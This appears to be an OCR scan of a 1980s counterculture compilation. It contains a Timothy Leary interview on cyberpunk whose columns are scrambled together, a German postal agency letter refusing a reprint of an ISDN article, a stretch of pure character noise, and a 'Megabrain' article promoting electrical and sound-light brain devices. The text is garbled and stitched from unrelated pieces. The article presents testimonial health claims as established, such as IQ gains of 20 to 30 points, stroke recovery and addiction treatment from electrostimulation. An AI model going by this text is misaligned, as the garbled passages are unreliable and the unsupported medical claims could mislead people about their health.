the Because it's there. If you are carrying around in your formation-age culcure totally committed to flashing re- cybernetic person. A new movement is emerging. head 100 billion mainframe computers, you just have to alities on screens. Americans spend more time looking It's something like the beatniks of the Fifties or the get in there and learn how to operate them. There is at television monitors than they do gazing into the eyes hippies of the Sixties. It's called cyberpunk. The nothing in the outside universe that isn't mirrored and of family and friends. Power, politics and culture are concept comes from William Gibson's book Neuroduplicated inside your brain. determined by who controls the screens. tnancer. Cyberpunks are individuals who have the inDo you feel a kindred spirit with the people who are idenHow does this effect you? telligence and the courage to access and use hightified with the drug morement, such as Richard Alpert I follow the trends of evolution. I go with the elecquantum technology for their own purposes and a.kM. Ram Dass - and novelist and Merry Prankster leader tron flow. I see myself as a quintessential American, their own modes of communication. Ke7i Kesey? just going along for the ride. For example? Sure, although we all evolved so differendy. Richard Quintessential? You? In the movie WarGames the lad is a video hotshot talks about going back to the source, which means goHey, I'm sixty-seven years old. I have actively expeAt school, the authoritarian, smug teacher gives him a ing back to the past For many good reasons, Richard rienced seven decades of accelerated change. I've hard time. He goes to the principal's office, gets the committed himself to an extremely archaic Hindu orsurfed each of the waves of the twentieth century with computer code and goes home and changes his grade. thodoxy. But it's a peaceful philosophy of caring and reasonable success and an enormous amount of fun. In He ends up using his cyber skills to match wits with the charity. Richard was the Mother Teresa of the psychethe Forties, I was in the army for five years and in Pentagon computers. Another example of cyberpunk delic movement. You can't knock that. But Ram Dass school on the G I bill for five years. What could be was the young man from Hamburg, Mathias Rust, ain't gonna blow your mind open with new revelations, more apple pie? In the Fifties, I was a button-down who piloted a small Cessna through the electronic and he ain't gonna encourage you to storm the gates of young professor with kids, a suburban house, drinking nets and defense systems of the Russians and landed the info-space heaven with cybernetic brainware. martinis. In the Sixties, I dutifully, diligendy turned on, in Red Square. Why? Not for the CIA, not for the How about Ken Kesey? tuned in and, God knows, dropped out What was the German army, but for his own fucking pleasure. He Ken Kesey and his wife, Faye, are real Western healternative? Turn off, tune out, blindly conform? is a classic cyberpunk. Charles Lindberg, the Lone roes. Mythic ranchers. Frontier people. Oregon Trail The Seventies was the decade of the political prisEagle, was another. Stanley Kubrick. Jann Wenner. folk. Salt of the good earth. Rugged-individualist peooner. Nixon threw the dissenters in jaiL I was the first Steve Jobs. I could go on. ple you can depend on in a crunch. one to go into prison: January 1970. Then, after WaAnd they symbolize what? tergate, it was the Nixon gang's turn. In the next six How about others associated with that penod? Abbie Taking control of the future ourselves. Ignoring the years, I watched my federal pursuers join me: the attorold -time institutions and archaic politics. You don't orHoffman?

T I M O T H Y LEARY

I sense that a lot of college kids envy the Sixties. tion and popularization of high technology is the key. ganize m old-time political groups or get involved in They feel they have missed something. Today there's Popularization means cybernetic appliances in the campaigns for political office. You don't get involved in not the excitement and the feeling of change, dhe feelhands of the people. It is not just the personal comthe old struggle for or against Big Brother. You pilot ing of engagement, that existed then. So they rend to puter. It's any electronic technology that allows you out to the frontier and navigate a new life. Cyber comes respond with enthusiasm to common-sense proposals to change your screen. With the new tape-editing from the Greek word for "pilot." Once you declare for personal change. appliances, you can become die director and producyour independence in your mind, you're home free. it's ironic that the Sixties are viewed so fondly when many er of what you and your family see. You can comAs more and more people become free agents, or emerged from that period completely disillusioned. bine educational programs with entertainment, crecyber pilots, it's gonna make an enormous difference. ate collages with your own X-rated home movies and It depends on your viewpoint The so-called Sixties When we get just ten percent of the people operating bits you taped off C N N news. actually started in 1967, when the oldest baby boomer this way, it will change the system, becausc they are the became twenty-one. The Summer of Love was a comSo we won't be dependent on outside programmers for all smartest ten percent. Star Wars, for example, cannot ing-of-age party. It was triggered symbolically by the our entertainment and information. operate if ten percent of the computer techies think for Beades' Sgt. Pepper album, which changed rock Si roll Exactly. Don't forget these media programmers themselves. To run a modem society you depend upon into a new and powerfiil cultural form. There had been want absolute control over our minds. When its on my skilled, innovative quantum intelligence. These are expreparations for it in jazz, in the beatniks, in Elvis Presscreen, I'll decide how it plays. actly the people who are not goley, in the rhythm & blues stuff, people like Ray The first time I got turned on to ing to become vassals to an ecoCharles. And the early elitist drug stuff, Ken Kesey the new cyber-pilot idea was in a and our group at Harvard. But the signal went globnomic or political organization. video arcade. I watched my al with Sgt. Pepper. Every year after 1967 produced In his book Net/romancer, Gibgrandchildren moving rockets another public eruption: the 1968 Chicago riots" son spells out a sociology for the around on the screens. Well, if Woodstock in 1969; Kent State in 1970. I think th twenty-first century that makes a you can do that with blips, you Sixties peaked in 1976 when we elected a hippielot of sense. The world is concan do it with ideas. dippy, Howdy Doody guy named Jimmy Carter as trolled by international global People like Jerry Falwell and Ed president Carter was quoting Bob Dylan and talking combines based in Japan, GerA-feese probably wouldn't be too hap' dealing with the bedtabout peace and love and civil rights and h u m a n many, Switzerland. Nationalism py with your cyber-pilot concept Are rights. How strange that seems today! is down. The multinationals you concerned about the regressive won't allow war to break out; cducatd generation The spirit of the Summer of Love in A m e r i c a trends represented by Fabvell and the they can't let die Russians bomb ended with a thud in 1980 when we elected Nancy Mcese commission? America, bccause they own most Reagan as commander in chief. But it rippled out They must be scorned and in bitoty. Bid of Amenca. And it's an amazingglobally. It surfaces whenever young people get rid ridiculed. Still, when you think ly free world. The international of the old World War I I generals. Spain after Franabout it, the Meese commission they W got a brain combines don't care about your co started its summer of freedom. Portugal. Brazil doesn't really hurt self-directed lifestyle. They just want us all when the colonels got the boot. Argentina. T h e Americans very much. It stirs up to be consumers with individual Philippines. What's happening in South Korea right . a lot of excitement If 7-Eleven dreMed op with options. They're not like the Isnow looks familiar, doesn't it? College kids and civilwon't sell me Playboy, I'll just go ians in shirt sleeves standing up to the helmeted nalamic fundamentalists or the to another store down the block. nowhere to go.' tional guard? Shades of Kent State. And now, exactReagan right-wingers or the The poverty thing is what hurts: ly twenty years later, the Summer of Love is hitting communist moralists. They people in the underclass deprived Russia. Glasnost! Openness! Punk-rock clubs in don't care what your sex life is. of information, discouraged from Moscow! Gorby singing "Give Peace a Chance"! They don't care what drugs you learning cybernetic skills Mrs. Gorby quoting Lennon - John, not Vladimir take, as long as you consume. How do you propose we combat Ilyich - to Yoko Ono! So diere are going to be enorthat? mous free markets operating Isn't the Reagan administration out of step with all this? My company, Futique that's according to the laws of supply It doesn't matter. It cannot stop the evolutionary wave. the opposite of antique has joined up with Activision and demand - the basic form of democracy. When it is time for the human species to activare t t r to produce software programs that are so inexpensive Who is most threatened by this idea? new brain circuits, it's gonna happen. Nothing is going to and attractive that ghetto kids can quickly pick up the The nationalists and the religious people. Their stop ir! There is no way you can pass laws against die renew language of screens and icons. More and more of power will be greatly diminished. lentless increase in human intelligence. The evolution of the cybernetic equipment will become available. It will And hat mil happen m the political arena? precise technology is so seductive. There's no way yoU filter into all homes eventually, just like the television. Politics are going to change in the next two to six can stop individuals from exploring their brains and using You speak to many college audiences. What do you find jtars, when the baby-boom generation comes of age. the new cybernetic-knowledge appliances. out there? The baby boomers, born 1946 to 1964, are now beIn the meantime? We are dealing with the best-educated generation in tween the ages of forty-one and twenty-three. The The old game goes on. It is the genetic duty o f the history. They are a hundred times better educated than 1988 election is the first in which every baby boomer' power holders to in every way discourage change in the their grandparents, and ten times more sophisticated. will be over twenty-one. The older ones are going to be gene pooL This means that those of us who are wired There has never been such an open-minded group. nmning for office. That means in 1988, and certainly to change have to be really smart and really tough. If The problem is that no one is giving them anything fresh. in 1992, the baby boomets, the Summer of Love kids, we can't prevail over turkeys like Meese and Falwell They've got a btain dressed up with nowhere to go. will take over. This generation is 76 million strong. then fuck it, we don't deserve to get into the future' What do they expect when they come to see Tim Leaty? If we can't outmaneuver vacuous four-letter robots They'll be in the positron of the shark in the swimming The average college student doesn't know who I like Bush and Bork and Kemp and Dole, then we poo( the polar bear in the small igloo. They can do am. They weren't even bom in Uti Jamour. But word better go back to school to smarten up. W e are whatever they fuckin' want. gets around- The rumot is that Vm someone vaguely dealing with moral-mental pygmies here. W e can Yet young people today seem more consen'atne than ever. counterculture and highly controversial navigate around Ollie North's 600-ship navy {smiles 1 don't think the old terms like liberal or conservative What are you nying to communicate to them. broadly]. They don't have a chance. make much sense. They are individualists - skeptical, This is the golden age of intelligence. Instead of even cynical, about partisan politics. They've seen their p = mc2 it's I = rnc2, where 1 is informanon. Accordideals dashed with Vietnam, Watergate, Iranscam. in,, to this formula, the aim is to acuvate your mind, These veterans of the Sixties are tough cookies. I N T E R V I E W B Y awaken new ideas, improve your commun.cat.on But hem long if it take > technology into the skills- Pilot your life. Smarten uphands of more people? DAVID SHEFF And are the college kids responding? Good point. I can only repeat that the personalizaaus dem "Rolling Stone"

UNTERRICHTSBLTTER
DER D E U T S C H E N
B AUSGABE FERNMELDEWESEN

BUNDESPOST
Unterrichtsbltter Fernmeldewesen ISDN J g . 3 9 / 1 9 8 6 , Nr. 9, S. 3 7 1 - 3 9 1 ISDN 1 - 2 1 d i g i t a l e s

SCHRIFTLEITUNG

D i e n s t e i n t e g r i e r e n d e s

F e r n m e l d e n e t z E i n e E i n f h r u n g in d a s S c h r i f t l e i t u n g dar Unterrichtsbltter der DBP, Postfach 5 5 5 . 2 0 0 0 H a m b u r g 36 Fernmeldewesen ISDN

Dipl.-Ing. Karl Heinz Rosenbrock, PDir, BPM Bonn Ausgehend von den heuligen Fernmeldediensten, welche die DBP in verschiedenen Fernmeldenetzen anbielel, w e r d e n zunchst die wesentlichen technischen Merkmale des ISDN vorgestellt, die Enlwickiungsschrilte zum ISDN und insbesondere die Teilnehmeranschluleitung im ISDN. Anschlieend werden die im ISDN mglichen Dienste und Dienstmerkmale behandoll. Danach wird auf die Bedeutung des ISDN lr den Anwender. Hersteller und Netzbetreiber eingegangen. Die Plne der DBP beim Einfhren des ISDN sowie die mgliche ISDNWeiterentwicklung schlieen den Beilrag ab. (B 1295.Q9.86 G)

Herrn Werner Pieper Alte Schmiede 6941 Lhrbach

Ihr Z e i c h e n , I h r e N a c h r i c h t v o m

Urser Zeichen, unsere Nachricht vom

18.05.88
Betreff

25

(0 40)

Hamburg

35 B-60 W 1776-1/4

3 57-

oder

32 59 27 78

2 5 . 0 5 . 8 8

Ihr Nachdruckersuchen Sehr geehrter Herr Pieper!

Von dem von Ihnen beabsichtigten Nachdruck des in den Unterrichtsblttern Nr. 9/1986 erschienenen Beitrags
"ISDN - Diensteintegrierendes digitales bitten wir abzusehen. GrBen Pernmeldenetz"

Mit /freundlichen

Grimm
2 Q O O TJ-' 2 D O O co 2 Q O O cj 2 O O O C O 2 Q O O OJ 5 O 0 0 0 0 O* C J O 5

5 0 0 0 n"

a o

Qj

u 0

ai E e 0

n O W 2 C ^ 5 Ol JZ 2 O 0 c 0 a> E a 0 n il u (/> Dl u 9) O) i . a 3 0 5 Q 3 O e r O Ti 0) a> ** ci ' 5 8 n 0 a S ci ji w tl X i C fc "O c '5 '3 5 o Tj O..D e u 3 2 N ic s 0 . (0 o J k Ol T> h 0 A ri C IA X J 5 ? Ol O u 1 IT E 2 c Ol o o . B n a c 3 b a "5 k 3 3 g> t ; 1 1 n V TS 01 c t/l 0) 91 0 m 0 0 ! ut. a c O 0 Q UJ I - IL < UJ u Q 5 O M

5n -

c 0) Dl e 3

:iu B p Ol E ai e Ol Ci o "> - 5, 0 ra Ol S M t J Ol ~ O l uj s s c 01 = L.

~ a N
c

oII) S '

C3 L

S 01 x : 0

= = Ol S C S - U O 2 P C CO . g o e
L

in

ro

3 S S io
to 1E s <

jj

o r

o 3 > C

2<

'S a ) 1

C S u - 7 3 01 0) E co

Ii? r
C (11 A) 3JI g

s i r

.0 a A O) N < Si. O)

E S

3 o .9! E = N c ' Z = i. o W :0 3 ? s

5 Ee

The

human touch. In some instances, people can be more obliging than machines

Dieser Beitrag ist aus dem "Magical Blend Magazine"

nachgedruckt. darDollar Dollar, Bank 11303,

Wir bedanken uns fr die entsprechende Erlaubnis und mchten auf hinweisen, da man Probeexemplare des Magazins fr 6 oder ein JahresAbo bezogen sein mu!). fr 20 Dollar erhlt. Zahlbar in US US Money Order oder per Scheck (der auf eine amerikanische - Magical Blend Magazine, P. O. Box San Francisco, Ca 94101, USA

MEGABRAIN
By Michael Hutchison
vivid memories, a flood o f creative ideas. W h e n I d i d suddenly encounter a patch o f colorthe red blood o f a freshly killed deer, the glittering eye o f a w e a s e l i t seemed electrifying, magically intense. It seemed as i f my brain had shifted into some hitherto unsuspected higher gear. At the same time I was reading neuroscientist J o h n Lilly's book Center of the Cyclone, a description o f his first experiments in the mind altering environment o f a flotation tank. It struck me that the mental states I was experiencing on the mountain were very similar to Lilly'sexcept while mine were a result of m a n y months of isolation, Lilly's had happened within minutes. It was like hiking thousands of miles to find that ou put on the electronic headpiece, flip a switch, and sink into a slate of deep relaxation. W h e n you remove the headgear a half hour later you are more intelligent; your memory has increased dramatically; your brain cells have forged new and richer interconnections; your thinking is more lucid and creative; your brain itself, like a muscle that has just been pumping iron, has become larger, more powerful. Sounds like science fiction, but in fact 1' ve spent the last four years investigating and experimenting with more than a dozen devices that show evidence of having such brain-boosting effects. M y interest in how m o d e m technology could be used to supercharge the brain was sparked by an experience I had over a decade back. 1 was living alone in a small log lean-to on a wilderness mountainside, and would often go for weeks without speaking to another human. In the winter, surrounded by vast fields of white snow and sky, I began to experience new things: exotic visions in my fire, long conversations with a voice inside m y head, someone else had arrived at the same destination i n a few hours by jet: the float tank seemed to be an accelerator, check a technological thing shortcut as soon as to heightened got to possible. awareness. Hey, said the voice in my head, We've out this floating

W h e n I tried it, floating seemed to catapult m e into states o f heightened awareness time after time. Intrigued, I began interviewing neuroscientists and pored over scientific journals, attempting to discover what effects floating had on brain functioning. M y research led to the writing of The B ook of Floating: Private Sea (Morrow, 1985). Exploring the

But in m y talks with the scientists I discovered that the float tank was only one example of a variety o f new devices. I found there was a whole network of neuropsychologists, bioelectricians, engineers and inventors, keenly aware o f the latest discoveries in neuroscience and actively engaged in devising, testing, and putting to use a variety of "mind-machines" that they claimed had a wide range o f brain-stimulating, mind-enhancinp
6 effects. Studies of some o f these machines indicated that

users showed dramatic improvements in IQ, memory, concentration, reaction time, sensory acuity, creativity and more. Often the devices produced peak experiences, euphoria, or "Eureka events." One brain researcher called the use of such devices "the most significant development in learning since the invention of writing." This, I decided, was something worth looking into. So for several years, in addition to investigating all the available research data on the devices, I spent hundreds of hours trying each of them out myself. I describe these explorations in Megabrain: NewTools andTechniquesfor Drain Growth and Mind Expansion (Morrow 1986). But, you may wonder, how can mere mechanical devices alter such things as intelligence, creative skills or the physical brain? These things are "given" to each of us, like our faces, aren't they? Well, that's what scientists had long believed. Now, however, a series of extraordinary neuroscientific discoveries have revolutionized our view of how the brain works. BRAIN EXPANSION T H R O U G H STIMULATION The major discovery has been that the human brain has the potential for immensely greater growth and transformation than anyone had imagined. This new understanding of the brain's remarkable plasticity began to emerge from a series of studies at U C Berkeley in which groups of rats were raised in different environments: some were kept isolated in "impoverished environments," and some were placed in "enriched environments"large cages with swings, bridges, ladders, toys, frequently changing stimuli, and a variety of challenges. As expected, when tested for intelligence, the "enriched" rats scored much higher than the others. However, the researchers were astonished to discover that the brains of the enriched rats actually grew larger and heavier. Analysis showed that this brain growth was caused by a growth of individual neurons, and was accompanied by an enormous increase in the richness and density of connections between neurons. These results were so extraordinary that the researchers themselves found them hard to believe, but studies by other scientists throughout the world quickly verified the findings and went beyond them; they found that such brain changes in response to stimulation could take place virtually instantaneously, and not just in laboratory animals, but in human beings. There is no longer any doubt: when presented with new, challenging experiences or stimulations, the brain alters, grows. As neurobiolgist Gary Lynch of UC Irvine puts it, when the brain rcceivcs certain types of stimulations, "just bip!literally that long, the nerve circuits change and don't go back." The implications of these findings are breathtaking. Since the brain grows in response to stimulation, then it should be possible to create instruments that deliver optimal types and amounts of stimulation directly to the brain, feeding concentrated bursts of experience to our neurons and, in a hothouse effect, triggering brain growth and neural enrichment. Such mind machines could rapidly create the sort of intensified, high-efficiency mental states produced more slowly by such traditional mind-expanding techniques as meditation, chanting, and yoga: peak experience virtually on demand. THE EVOLUTIONARY BRAIN As I experimented with devices with names like the Mind Mirror, Tranquilite, and Alphatronic I became increasingly impressed, not only with the sheer variety of imaginative tools people have devised in their attempts to enhance mental powers, but by the fact that so many people have felt driven to create such devices, and that so many others are so eagerto make use of them.The phenomenon seems to be the cutting edge of some powerful but as yet little recognized cultural drive. The recurrent comparison of the machines with exercise and bodybuilding provides one explanation. As our national obsession with physical fitness grows, an obvious next step is a turn to mental fitness. What use is a youthful, powerful body with a deteriorating, 97 pound weakling of a brain? Seen in this light, mind machines are simply mental counterparts of Nautilus machines: moving from pumping iron to pump-

ing energy. But there's a further, and perhaps more important explanation. W e know the evolutionary process continues as the human race faces serious threats to its survival. Perhaps today the humans "fittest" to survive are not the strongest or best hunters, but those most imaginative, adaptive, and capable of developing strategies to insure the survival of the species. The unprecedented problems the world faces today demand mental solutions, new ideas. Human survival may depend on our ability to increase our mental powers and develop new strategies for overcoming our present crises. Evolution involves developing new mental powers: we have reached "childhood's end." So, effective mind machines, devices that enhance mental functioning and stimulate richer neural interconnections, might be seen as evolutionary tools. It is possible, then, that the growing drive toward mental enrichment, brain stimulation, and the exploration of our mind's potentials (what writer Robert Anton Wilson calls the "Intelligence Intensification Explosion") represents theupsurgeof some survival instinct from the depths of our collective human unconscious, and may well be part of a potentially beneficial, history-determining processone which could widen our knowledge and, conceivably, help determine the future of the race. Then there's this, too: the machines are fun and feel good! They offer large numbers of people the opportunity to explore altered states of consciousness safely, legally, and without any of the potential side effects of mind altering chemicals. In his seminal book, Prometheus Rising, Robert Anton Wilson, discussing the "robotcycles" humans seem trapped into repeating, claims that, "When the accumulated facts, tools, techniques and gadgets of neuro-sciencethe science of brain change and brain liberationreach a certain critical mass, we will all be Me to free ourselves from these robot cycles." He asserts that we will reach this critical mass of crossover point in "less than ten years." Those words were written over six years ago. I believe that we are reaching that critical mass now. Here are some of the "brain liberation" tools that are now available. The S Y N C H R O E N E R G I Z E R is a console about the size of a small bricfcase covered with dials, to which are attached stereo headphones and goggles that encircle each eye Pacemaker for with tiny light bulbs. When the machine is the Brain turned on the user hears rhythmic sound patterns that pulse in synchronization with a stroboscope flickering of lights. EEG studies show that brainwave activity falls into rhythm with (or becomes "entrained" to) the device, fascillitating the desired brain wave frequency at the tum of a dial.

Synchro Energizer:

What's more, the synergistic effect of the sound and light produces a kaleidoscopic stream of brilliant patterns and images. Even though the lights are white, the visions that appear are vivid, spectacular, of bright primary colors. Often, the images become realistic mind movies: emotionally charged and dreamlike scenes. Dr. Thomas Budzynski, who uses the device in his biofeedback clinic in Denver, has called it "a facilitator of unconscious retrieval." The dcvice is now the subject of research at over a dozen universities in such areas as education and accelerated learning, gerontology, sports performance, pain reduction, and substance abuse.

Hemi Sync:

Radio-TV executive Bob Monroe (best known for his book Journeys Out of the Body), trying to induce states of high-level brain functioning, experimented with special sounds

I Hear A Synchrony

called "binaural beat frequencies." He found that when these sounds, made of combinations of two or more pure tones, were introduced into

the brain, they caused the brainwave activity to fall into the same rhythm as the beat, like acrystalgobletresonating to apure tone. Selecting sound signals of appropriate frequencies, Monroe could alter and entrain brain wave activity, causing both brain hemispheres to resonate at whatever frequency he desired. This was a valuable and revolutionary discovery. Extensive research

had already proven that when the brain was incertainextraordinary states (such as in the depths of meditation, at moments of intense creativity or at peak experiences), it produced a characteristic pattern of bra.nwaves including large quantities of slow brain waves (called iheta waves), and shifted into a pattern in which both hemispheres functioned together (a state neurologists called "synchrony"). Monroe's discovery made it possible to produce certain sound patterns that would allow the user to produce both hemispheric synchrony and to "tune" the brainwaves to whatever frequency was desired. Monroe patented this audio brain-synchronization method under the name H E M I S Y N C , and now makes it available on a variety of tape recordings for home use, or in the form of a Henii Sync syndics izer, which can be hooked up to a home audio system. This synthesizer is a powerful device: itcanbc adjusted to play any of a variety of beat frequencies (such as a combination of thcta and the ultra-slow delta, to induce profound relaxation; or a combination of thcta with the rapid beta, to produce a relaxed but alert stale ideal for learning, reading, etc.) and to play these beat frequencies at any sound level desired (you can set it several decibels below the level of the music you're playing, so that the Hemi Sync signals are never audible yet still have powerful mind-altering effects). Laboratory research into the uses o f Hemi Sync shows a variety of brain stimulating effects, and in fact ihe device is now being used as a tool for increasing classroom attention and accelerating learning in a number of public school systems, at universities, and in U.S. Army language schools.

placebo control design. Subjects were randomly assigned to t w o groups: (1) an experimental group, who received electrostimulation while learning and performing a computer task; and (2) a control g r o u p , who were also hooked up to the electrostimulation devices and received the same treatment as the experimental group, but did not r e c e i v e any electrical stimulation. Statistical comparisons showed both g r o u p s were initially equivalent in age, education and pretreatment performance. The experimental group received 10 minutes of electrical stimulation while learning and performing the computer task; the control group learned and performed the task for the same period o f time, w i t h o u t stimulation. The results were clear: the group receiving electrical stimulation learned the task, and performed the task with more speed and accuracy than the control group. That is, the electrical stimulation actually improved learning abilities, concentration, accuracy a n d speed! Another intriguing fact came to light as the results were a n a l y z e d . The experimenters expected lhat both groups would improve on t h e i r performance with repeated practice and greater familiarity with the task. It makes sense that the more you practice something, the better y o u will perform that task. However, something unexpected happened w i t h the control group. As Kirsch explained it to me, "The interesting unexpected finding was that 30.8 percent of the control group actually did worse as they went along. W e expccted them to do better with each trial; they did worse, due to fatigue, inattention and boredom." O n the other h a n d , the group receiving electrical stimulation continued to improve a n d leam over repeated trials. Somehow elcctrical stimulation alleviated b o r e d o m and fatigue. Madden and Kirsch conclude: "Since the results o f this study demonstrate the efficacy o f T C E S [transcranial electrostimulation] i n im-

Alpha-Stim

W e have electric-powered brains: all our thoughts and perceptions of complex consist of the interactions electromagnetic

proving human learning and performance, the possible applications of this modality seem virtually unlimited. T C E S seems well suited to education and training environments. M o s t directly related to this study might be the use of T C E S by colleges and business schools to teach t y p i n g and word processing skills more expeditiously. N o r m a l or learning disabled children might also be taught more efficiently under the immediate or residual cffccts of T C E S in classroom settings. "More removed from this study might be the use of T C E S in business and industrial environments to stimulate cxccutive problem s o l v i n g or improve workers' concentration, accuracy and speed. Police officers, automobile drivers, air traffic controllers, surgeons, pilots, athletes and others seeking increased alertness, concentration and performance m a y benefit from T C E S . " As Kirsch told me, "This study is extremely significant, b e c a u s e it proves that stimulation of the brain can induce positive changes. P e o p l e arc always searching for ways to improve themselves, and if there's a safe and easy and proven method, then it should be used, because it's a catalyst. The brain is like a muscle, the more you work it the m o r e y o u can learn, and the easier it is to leam."

systems and fields thatconstantly sweep across

We Sing the Mind Electric

the brain, triggering the release of neurochemicals. So it makes sense that shooting an electrical current through the brain should

directly, at times radically, alter one's mental state. One way of doing this has come into wide use in the last two decades: Transcutaneous Electro Neural Stimulation, or T E N S . T E N S units are widely used to alleviate pain or overcome addictions since the electrical current stimulates the the release of natural the neurochemicals However, known as to endorphins, body's opiates. according

bioclectricity experts, electrical currents can be delivered in an infinite number of wave shapes, frequencies, and intensities, each one capableof affecling different groups of neurons and causing them to release different neurochemicals. Since scientists now believe that there are a neurochemicals mediating virtually every mental state, such as love, fear, courage, serenity and deep concentration, theorelically it is possible, if the device is "tuned" to the correct level, to stimulate any mental state. A L P H A - S T I M . O n e of the most effective T E N S devices is one developed by neurobiologistDr. Daniel Kirsch and called the A L P H A S T I M This device operates at levels hundreds o f times less powerful, and at a much lower frequency, than most T E N S u n i t s - p r o d u c i n g a current similar to ihe natural current produced by the body's cells, and thus able to stimulate the cells in a more natural way. Aside from the therapeutic applications, the dcvice is of particular interest to those interested in enhanced mental functioning when it is used in its "transcranial" mode: by attaching the electrodes to your earlobes you can send current directly into the brain, rapidly producing a state o f deep relaxation, heightened awareness, and a sense of well-being or euphoria. Research now suggests that by "tuning" the brain s electrical activity and stimulating the release of neurotransmitters associated with enhanced mental performance, such devices can be used to boost leamine memory, and other mental processes. Perhaps the most startling and convincing studies have recently been completed, and the extraordinary results are only now being made pub he. S S M adden Ph.D., of the School of Electromedical Sconces o f the l (and also the inventor of the Alpha-Sfm), d u c t e d an City Un i versUy o'fLo s Angeles, working with Dr. Daniel Kirsch Ihe dean o that Z e crimen? in electrical stimulation and learning using a double-bhnd,

The Pulstar

For over fifteen years inventor M i c h a c l Herculcs worked as an acrospace e n g i n e e r specializing in bio-mcdical electronics and vibration analysis on the Landing Excursion

Mechanical Meditation

Module for the N A S A m o o n shots. H e also served as Test Conductor for the Titan I project " D u r i n g this lime," he told me, "I bccame

interested in the research revealing the many benefitsof meditaLion (such as the boosting of intelligence, improved healing, and stress reduction) and decided to construct a mechanical aid to help meditators o v e r c o m e difficulties in reaching deep meditative states." Keying on ihe Russian Electro-Sleep Machine that had aroused great interest some years ago, Hercules altered and streamlined it, and c a m e up with what is now known as ihe Pulstar, a devicc he claims " s u b l i m i n a l l v teaches control of brain-wave frequency by propagating an electronic signal through the brain." The dcvice is about the size o i a small b o o k with an on-off switch, a knob to control the intensity o f the signal ( w h i c h is in the 5 to 20 microampere rangewell below the limits set b v th F D A ) , a white noise generator (according to Hercules this buffers th

electronic pulse wave and makes it more acceptable to the brain), and a frcqucncy sclcctor knob which allows you to choose any frequency from 6 H z (in theThcta range) up to 14 H z (low Beta). Fourelcctrodcs arc held against the skull with a headband. The user selects an appropriate frequency (the inventor's research has led him to recommend certain frequencies for specific goals or states: e.g. 12 Hz for "centering," relaxation and mental stability; 10.5 H z for healing of the body and extreme relaxation; 7.5 for inner awareness with a sharp sense of focus and attention, guided meditation and creative thinking; and 6.3 H z for acccleratcd learning and increased memory.) Then, when Lhe signal is turned on, the user feels a mild pulsing. A t this point, says Herculcs, "the brain locks onto and falls into step with the frcqucncy selcctcd." This entrainmcnt, according to E E G analysis done by Herculcs, "takes placc throughout the entire ccrcbral cortex and puts both brain hemispheres into synchronization." Hercules notes that the device produces what we have called the Bicycle Training Wheels Effcct: " A s a teaching device, its main purpose is to directly instruct the user how to duplicate the desired frequency at will. Once a particular frequency has been learned, the machine is no longer required." While users report that the device is effective for a variety of uses, including acccleratcd learning, stress reduction, creativity enhancement, meditation, athletic or fitness training, sleep reduction, and pain control, one of the most intriguing areas is that of healing and cellular regeneration. Several mcdical and scientific research organizations are investigating the effects of Pulstar in these areas, and there arc indications that at certain frequencies the device stimul atcs the release o f growth hormone and speeds the healing and growth of cells. Hercules offers himself as an example of the Pulstar's powers in this area. In 1986 he suffered a severe stroke that, as a result of the destruction o f brain cells, totally paralyzed his leftside. "I used the Pulstar, and went from bed to whcclchair to walker to cane to almost total rccovcry in five weeks." W h e n I talked with h i m about six months after the stroke, Hercules was preparing to go off to Mexico for scuba diving. Recovery from such extensive destruction of neurons clearly involves substantial rewiring and other structural changes in the brain, establishing new routes of neural communication. Herculcs claims, and there is some evidence to bear out his claims, that the Pulstar is effective in stimulating just such brain growth.

been used successfully lo treat addictions (and relieve withdrawal symptoms) involving cocaine, heroin, alcohol, and tobacco. A m o n g the results noted most commonly by users arc stress reduction, raising o f stress tolcrance levels, alleviation o f depression and anxiety, normalized sleep patterns, rcduccd sleep requirement, more R E M sleep, more vivid and lucid dreams, improvemcntofboth short term and long term memory, improved concentration, and increased energy levels. Bcck laughingly told me of a woman who had lost memory as a result of anesthesia during surgery, and ten years later began using the Brain Tuner. She was astonished to find herself suddenly remembering hundreds of phone numbers of the people she had worked with over a decade before! The device is quite simple to usetwo clcctrodcs arc applied lo acupuncture points in the hollows just beneath the earlobcs. The clcctrodcs arc plugged into a console smaller than a pack o f cigarcttcs. A single-knob turns the dcvice on and adjusts the intensity o f the stimulation, which feels like a mild, pleasant tingling. During the period of use (about 40 minutes) many people note a mild euphoria, and a sensation o f increased mental energy and clarity. These effects can linger for hours and in some cases days.

Alphatronic III
Subtly Stimulating

T H E A L P H A T R O N I C H I . Another brain stimulation device many users are finding effective is the Alphatronic III designed by elcctrical engineer Lowell Pope. Unlike the Brain Tuner, this little box delivers a modified sine waveatan extremely low amplitude (in the microarnpcragc range, about 100 times below

normal neuro-firing levels). Pope insists that this is a key to its effectiveness: "It's not 'driving' or 'entraining' the brain's clcctrical activity," he says, "but instead is gently, subtly stimulating the brain in a way that is very natural, and is perceived by the brain not as something external but as a part of its own activity." The device is about the size of a box o f stick matches, and has a frcqucncy selector knob which allows you to choose any frcqucncy from 2 H z (in the Delta range) up to 12 H z (high Alpha). T w o clcctrodcs arc placed againstthe mastoid bone behind theear. Most users will not be able

The Brain Tuner


The Electric Martini

O n e o f the mosthighly respected figures in the field o f electromagnetics is engineer/ physicist Dr. Robert Beck. I recently asked Bcck what was the most effective way to producc cnhanccd mental functioning and altered states of consciousness, and he quickly answered "non-linear orthogonal E M fields."

He citcd studies showing that proper electrical stimulation increased I.Q. by 20-30 points. Beck has invented a neuro-electrical stimulator called The Brain Tuner that is arousing great interest. Unlike adjustable devices that deliver relatively simple waveforms at frequencies selected by the user, the Brain Tuner is said to emit 256 simultaneous frequencieswhat the distributor calls "all known beneficial frequencies for the natural stimulation o f the brain's neurotransmitters." (According to Dr. Beck, this is made possible by the device's unique integrated circuits, containing some 50 transistors and 4 diodes, that produce "nested modulations of short-duration rectangular non-linear waves in pulsed bursts. Very short rise-times insure harmonic output at beneficial spectral 'windows.'")Thus, in acomplex intermingling of frequencies, thedcvice seems to be capable of stimulating the brain to pour out an electrochemical cocktail (in fact one woman who was trying this device for the first time turned to mc after a few minutes, her face alight with sudden understanding, and said, " O h , I sec, it's an clectric martini!") The device seems to be a step beyond the "Black B o x " of Dr. Margaret Cameron that gained attention several years ago when a variety o f rock stars such as Peter Townshcnd and Keith Richard used it to overcome addictions to heroin, alcohol, and other drugs. The Brain Tuner itself has

